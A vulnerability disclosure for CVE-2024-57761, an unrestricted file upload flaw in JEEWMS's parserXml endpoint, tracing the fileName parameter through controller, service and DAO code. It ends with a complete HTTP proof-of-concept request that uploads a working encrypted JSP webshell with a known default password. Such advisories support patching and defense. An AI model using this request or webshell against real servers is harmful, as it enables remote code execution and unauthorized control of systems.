JEEWMS-commonController.do? ParserXML exists for file upload

CVE-2024-57761
find by Chaitin Security Research Lab

Vulnerability Product: JEEWMS
Vulnerability version: before 2025.01.01
Vulnerability type: file upload
Vulnerability Details：
1. Global search for new File found that at org/jeecgframework/core/common/dao/ipl/CommonDao. java: 481, a new 'File' object with a specified file path will be created in the parserXML() method of the commonDao layer, and the string 'fileName' parameter will be passed into it to track whether this method has filtering behavior on fileName
![输入图片说明](https://foruda.gitee.com/images/1736129833476242515/72743da2_13737655.png "屏幕截图")
2. From the parserXML() method to org/jeecgframework/core/common/service/ipl/CommonServiceImpl. java: 359, it was found that this method was returned by parserXML(). Continue to see where this method is called
![输入图片说明](https://foruda.gitee.com/images/1736129846223364282/57715142_13737655.png "屏幕截图")
3. Continuing the analysis to the controller layer, it was found that org/jeecgframework/web/system/controller/core/CommonController. java: 179 directly called the parserXML() method and concatenated the fileName parameter. When analyzing upwards and knowing that there is a parserXML parameter in the route, this method will be implemented. At org/jeecgframework/web/system/controller/core/CommonController. java: 159, an empty fileName parameter will be created
![输入图片说明](https://foruda.gitee.com/images/1736129863240153090/c1f23355_13737655.png "屏幕截图")
4. By analyzing org/jeecgframework/web/system/controller/core/CommonController. java: 170, the file name is directly obtained from the uploaded file and passed to fileName. Downward analysis directly concatenates fileName, and the entire process does not blacklist or whitelist the file. The parameter fileName is controllable, so there is a file upload vulnerability here
![输入图片说明](https://foruda.gitee.com/images/1736129878866547167/6120fa6e_13737655.png "屏幕截图")
5. Constructing POC requires logging in before it can be triggered, and the values of cookies and _csrf need to be replaced

```
POST /jeewms/commonController.do?parserXml HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Cookie: JSESSIONID=F571DC569F0A3DC553D8D25ACA42D570; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=1990; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1713256699,1713260101
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHRhkXyQjTSAk8j8c
Content-Length: 792

------WebKitFormBoundaryHRhkXyQjTSAk8j8c
Content-Disposition: form-data; name="file"; filename="hai.jsp"
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryHRhkXyQjTSAk8j8c--
```
![输入图片说明](https://foruda.gitee.com/images/1736129940789199611/2fd94238_13737655.png "屏幕截图")

![输入图片说明](https://foruda.gitee.com/images/1736129956279681071/ed3ce61b_13737655.png "屏幕截图")

GVP JeeWMS/JeeWMS

内容风险标识

评论 (0)

GVPJeeWMS/JeeWMS

内容风险标识